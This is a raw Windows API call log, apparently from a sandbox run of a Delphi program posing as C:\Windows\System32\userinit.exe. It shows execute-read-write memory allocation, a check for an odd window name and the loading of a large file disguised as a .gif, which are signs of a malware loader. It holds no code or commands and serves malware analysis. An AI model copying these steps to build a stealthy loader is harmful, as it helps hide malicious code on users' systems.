[0188.687] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0188.687] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0188.687] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0188.687] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0188.687] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0188.687] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0188.687] GetDC (hWnd=0x0) returned 0x74010839
[0188.687] GetDeviceCaps (hdc=0x74010839, index=90) returned 96
[0188.687] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0188.687] GetDC (hWnd=0x0) returned 0x74010839
[0188.687] GetDeviceCaps (hdc=0x74010839, index=104) returned 0
[0188.687] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0188.687] CreatePalette (plpal=0x8f338) returned 0x8108084b
[0188.687] GetStockObject (i=7) returned 0x1b00017
[0188.688] GetStockObject (i=5) returned 0x1900015
[0188.688] GetStockObject (i=13) returned 0x18a002e
[0188.688] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0188.688] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0188.688] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0188.688] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0188.689] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0188.690] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0188.690] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0188.690] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0188.690] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0188.690] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x8f334, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0188.690] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0188.690] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0188.690] GetVersion () returned 0x1db10106
[0188.690] GetCurrentProcessId () returned 0x80c
[0188.690] GlobalAddAtomA (lpString="Delphi0000080C") returned 0xc0f8
[0188.690] GetCurrentThreadId () returned 0x810
[0188.690] GlobalAddAtomA (lpString="ControlOfs0040000000000810") returned 0xc0f7
[0188.690] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000810") returned 0xc187
[0188.690] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0188.690] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0188.690] GetSystemMetrics (nIndex=19) returned 1
[0188.742] GetSystemMetrics (nIndex=75) returned 1
[0188.742] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0188.742] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0188.743] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0188.743] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x60111
[0188.743] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0188.743] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0188.743] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0188.743] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x190067
[0188.743] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x1001cd
[0188.743] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xe01b3
[0188.744] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xf01e3
[0188.744] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xe01b1
[0188.744] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xd01af
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0188.744] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0188.744] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0188.744] GetDC (hWnd=0x0) returned 0x74010839
[0188.744] GetDeviceCaps (hdc=0x74010839, index=90) returned 96
[0188.745] ReleaseDC (hWnd=0x0, hDC=0x74010839) returned 1
[0188.745] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0188.745] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0188.745] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x8f69f, fWinIni=0x0 | out: pvParam=0x8f69f) returned 1
[0188.745] CreateFontIndirectA (lplf=0x8f69f) returned 0x360a0868
[0188.745] GetObjectA (in: h=0x360a0868, c=60, pv=0x8f490 | out: pv=0x8f490) returned 60
[0188.745] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x8f54b, fWinIni=0x0 | out: pvParam=0x8f54b) returned 1
[0188.745] CreateFontIndirectA (lplf=0x8f627) returned 0x570a083b
[0188.745] GetObjectA (in: h=0x570a083b, c=60, pv=0x8f490 | out: pv=0x8f490) returned 60
[0188.745] CreateFontIndirectA (lplf=0x8f5eb) returned 0x4f0a0873
[0188.745] GetObjectA (in: h=0x4f0a0873, c=60, pv=0x8f490 | out: pv=0x8f490) returned 60
[0188.745] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0188.746] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x8f5ff, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0188.746] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x8f5ff | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0188.746] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x110000
[0188.746] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x8f5b4 | out: lpWndClass=0x8f5b4) returned 0
[0188.746] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0188.746] GetSystemMetrics (nIndex=0) returned 1440
[0188.746] GetSystemMetrics (nIndex=1) returned 900
[0188.746] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xd01e4
[0188.750] SetWindowLongA (hWnd=0xd01e4, nIndex=-4, dwNewLong=1118191) returned 4219500
[0188.750] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0188.750] SendMessageA (hWnd=0xd01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0188.750] DefWindowProcA (hWnd=0xd01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0188.760] DefWindowProcA (hWnd=0xd01e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xd01c7
[0188.761] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0188.761] SetClassLongA (hWnd=0xd01e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0188.762] GetSystemMenu (hWnd=0xd01e4, bRevert=0) returned 0x100221
[0188.763] DeleteMenu (hMenu=0x100221, uPosition=0xf030, uFlags=0x0) returned 1
[0188.763] DeleteMenu (hMenu=0x100221, uPosition=0xf000, uFlags=0x0) returned 1
[0188.763] DeleteMenu (hMenu=0x100221, uPosition=0xf010, uFlags=0x0) returned 1
[0188.764] GetKeyboardLayoutList (in: nBuff=64, lpList=0x8f580 | out: lpList=0x8f580) returned 1
[0188.765] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0188.765] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0188.765] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0188.765] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0188.765] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0188.765] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0188.766] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0188.766] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0188.766] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0188.766] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0188.766] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0188.766] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0188.766] GetCurrentThreadId () returned 0x810
[0188.766] GlobalAddAtomA (lpString="WndProcPtr0040000000000810") returned 0xc0f6
[0188.767] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0188.767] ShowWindow (hWnd=0xd01e4, nCmdShow=0) returned 0
[0188.767] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0188.767] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0188.767] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x8f300*=0) returned 0x0
[0188.767] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f2f8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x8f2f8*=0) returned 0x0
[0188.767] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f2f8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x8f2f8*=0) returned 0x10be00
[0188.767] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x8f2f8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x8f2f8*=0) returned 0x0
[0188.768] GlobalLock (hMem=0x360004) returned 0x790020
[0188.768] ReadFile (in: hFile=0x98, lpBuffer=0x790020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x8f314, lpOverlapped=0x0 | out: lpBuffer=0x790020*, lpNumberOfBytesRead=0x8f314*=0x10be00, lpOverlapped=0x0) returned 1
[0188.834] CloseHandle (hObject=0x98) returned 1
[0188.835] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.835] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.835] GlobalUnlock (hMem=0x36000c) returned 0
[0188.836] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4000, uFlags=0x2) returned 0x36000c
[0188.836] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.836] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.836] GlobalUnlock (hMem=0x36000c) returned 0
[0188.836] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6000, uFlags=0x2) returned 0x36000c
[0188.837] GlobalLock (hMem=0x36000c) returned 0x15a820
[0188.837] GlobalHandle (pMem=0x15a820) returned 0x36000c
[0188.837] GlobalUnlock (hMem=0x36000c) returned 0
[0188.837] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8000, uFlags=0x2) returned 0x36000c
[0188.837] GlobalLock (hMem=0x36000c) returned 0x160830
[0188.838] GlobalHandle (pMem=0x160830) returned 0x36000c
[0188.838] GlobalUnlock (hMem=0x36000c) returned 0
[0188.838] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa000, uFlags=0x2) returned 0x36000c
[0188.838] GlobalLock (hMem=0x36000c) returned 0x160830
[0188.838] GlobalHandle (pMem=0x160830) returned 0x36000c
[0188.838] GlobalUnlock (hMem=0x36000c) returned 0
[0188.838] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc000, uFlags=0x2) returned 0x36000c
[0188.839] GlobalLock (hMem=0x36000c) returned 0x16a840
[0188.839] GlobalHandle (pMem=0x16a840) returned 0x36000c
[0188.839] GlobalUnlock (hMem=0x36000c) returned 0
[0188.839] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe000, uFlags=0x2) returned 0x36000c
[0188.839] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.840] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.840] GlobalUnlock (hMem=0x36000c) returned 0
[0188.840] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10000, uFlags=0x2) returned 0x36000c
[0188.840] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.840] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.840] GlobalUnlock (hMem=0x36000c) returned 0
[0188.840] GlobalReAlloc (hMem=0x36000c, dwBytes=0x12000, uFlags=0x2) returned 0x36000c
[0188.840] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.841] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.841] GlobalUnlock (hMem=0x36000c) returned 0
[0188.841] GlobalReAlloc (hMem=0x36000c, dwBytes=0x14000, uFlags=0x2) returned 0x36000c
[0188.841] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.841] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.841] GlobalUnlock (hMem=0x36000c) returned 0
[0188.841] GlobalReAlloc (hMem=0x36000c, dwBytes=0x16000, uFlags=0x2) returned 0x36000c
[0188.841] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.842] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.842] GlobalUnlock (hMem=0x36000c) returned 0
[0188.842] GlobalReAlloc (hMem=0x36000c, dwBytes=0x18000, uFlags=0x2) returned 0x36000c
[0188.842] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.842] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.842] GlobalUnlock (hMem=0x36000c) returned 0
[0188.842] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1a000, uFlags=0x2) returned 0x36000c
[0188.842] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.843] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.843] GlobalUnlock (hMem=0x36000c) returned 0
[0188.843] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1c000, uFlags=0x2) returned 0x36000c
[0188.843] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.843] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.843] GlobalUnlock (hMem=0x36000c) returned 0
[0188.843] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1e000, uFlags=0x2) returned 0x36000c
[0188.843] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.844] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.844] GlobalUnlock (hMem=0x36000c) returned 0
[0188.844] GlobalReAlloc (hMem=0x36000c, dwBytes=0x20000, uFlags=0x2) returned 0x36000c
[0188.844] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.844] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.844] GlobalUnlock (hMem=0x36000c) returned 0
[0188.844] GlobalReAlloc (hMem=0x36000c, dwBytes=0x22000, uFlags=0x2) returned 0x36000c
[0188.846] GlobalLock (hMem=0x36000c) returned 0x176820
[0188.846] GlobalHandle (pMem=0x176820) returned 0x36000c
[0188.846] GlobalUnlock (hMem=0x36000c) returned 0
[0188.846] GlobalReAlloc (hMem=0x36000c, dwBytes=0x24000, uFlags=0x2) returned 0x36000c
[0188.846] GlobalLock (hMem=0x36000c) returned 0x176820
[0188.847] GlobalHandle (pMem=0x176820) returned 0x36000c
[0188.847] GlobalUnlock (hMem=0x36000c) returned 0
[0188.847] GlobalReAlloc (hMem=0x36000c, dwBytes=0x26000, uFlags=0x2) returned 0x36000c
[0188.848] GlobalLock (hMem=0x36000c) returned 0x19a830
[0188.849] GlobalHandle (pMem=0x19a830) returned 0x36000c
[0188.849] GlobalUnlock (hMem=0x36000c) returned 0
[0188.849] GlobalReAlloc (hMem=0x36000c, dwBytes=0x28000, uFlags=0x2) returned 0x36000c
[0188.849] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.849] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.849] GlobalUnlock (hMem=0x36000c) returned 0
[0188.849] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2a000, uFlags=0x2) returned 0x36000c
[0188.849] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.850] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.850] GlobalUnlock (hMem=0x36000c) returned 0
[0188.850] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2c000, uFlags=0x2) returned 0x36000c
[0188.850] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.850] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.850] GlobalUnlock (hMem=0x36000c) returned 0
[0188.850] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2e000, uFlags=0x2) returned 0x36000c
[0188.850] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.851] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.851] GlobalUnlock (hMem=0x36000c) returned 0
[0188.851] GlobalReAlloc (hMem=0x36000c, dwBytes=0x30000, uFlags=0x2) returned 0x36000c
[0188.851] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.851] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.851] GlobalUnlock (hMem=0x36000c) returned 0
[0188.851] GlobalReAlloc (hMem=0x36000c, dwBytes=0x32000, uFlags=0x2) returned 0x36000c
[0188.851] GlobalLock (hMem=0x36000c) returned 0x156810
